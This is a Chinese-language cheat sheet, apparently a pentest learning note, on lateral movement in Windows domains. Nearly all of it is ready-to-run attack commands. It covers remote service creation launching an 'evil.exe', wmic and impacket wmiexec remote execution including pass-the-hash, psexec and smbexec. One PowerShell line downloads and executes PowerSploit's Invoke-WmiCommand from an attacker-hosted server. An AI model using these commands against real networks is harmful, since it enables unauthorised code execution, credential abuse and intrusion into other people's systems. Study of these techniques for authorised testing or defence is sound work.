域环境搭建
参考 https://blog.csdn.net/niexinming/article/details/75650128
开启$ipc和$admin
1 2
| net share $ipc net share $admin
|
直接执行
1 2
| dir \\IP\c$ tasklist /S IP /U 用户 /P 密码
|
sc
1 2 3
| sc \\[HOST] create boom binpath= c:\evil.exe sc \\[HOST] start boom sc \\[HOST] delete boom
|
wmic
1
| wmic /node:172.18.16.172 /user:admin /password:password process call create "cmd.exe /c ipconfig>c:\result.txt"
|
wmiexec.py
安装:
1 2 3
| git clone https://github.com/CoreSecurity/impacket.git cd impacket/ pip install
|
用户密码
1
| python wmiexec.py 用户名:密码@目标IP
|
哈希传递
1
| python wmiexec.py -hashes LM Hash:NT Hash 域名/用户名@目标IP
|
wmiexec.vbs
1
| cscript.exe wmiexec.vbs /cmd 172.18.16.172 administrator password “command”
|
powershell工具
Invoke-WmiCommand.ps1是PowerSploit中的一个脚本工具,该脚本主要通过powershell调用WMI来远程执行命令,本质上还是利用WMI。
下载地址:https://github.com/PowerShellMafia/PowerSploit
1 2 3 4 5 6 7 8 9 10
| git clone https: cd PowerSploit-master\PowerSploit-master\CodeExecution python –m SimpleHTTPServer powershell IEX(New-Object Net.Webclient).DownloadString('http://xx.xx.xx.xx//Invoke-WmiCommand.ps1') $User = "域名\用户名" $Password = ConvertTo-SecureString -String "文明密码" -AsPlainText -Force $Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User,$Password $Remote = Invoke-WmiCommand -Payload {要执行的命令} -Credential $Cred -ComputerName 目标IP $Remote.PayloadOutput
|
Invoke-WMIMethod.ps1(无回显)
Invoke-WMIMethod.ps1模块是powershell自带的,可以在远程系统中执行命令和指定程序。在powershell命令行环境执行如下命令,可以以非交互式的方式执行远程命令,但不会回显执行结果。
1 2 3 4
| $User="域名\用户名" // 指定目标系统用户名 $Password=ConvertTo-SecureString -String "密码" -AsPlainText -Force // 指定目标系统密码 $Cred=New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User,$Password // 将账号和密码整合起来,以便导入 Credential中 Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "notepad.exe" -ComputerName "目标机IP" -Credential $Cred // 在远程系统中运行notepad.exe命令
|
psexec
1
| psexec.exe \\ip –u 账号 –p 密码 cmd.exe /c ipconfig
|
smbexec
1 2
| https://github.com/SecureAuthCorp/impacket smbexec.py 用户名:密码@IP
|
参考文档
https://www.freebuf.com/articles/network/246440.html
https://cloud.tencent.com/developer/article/1752145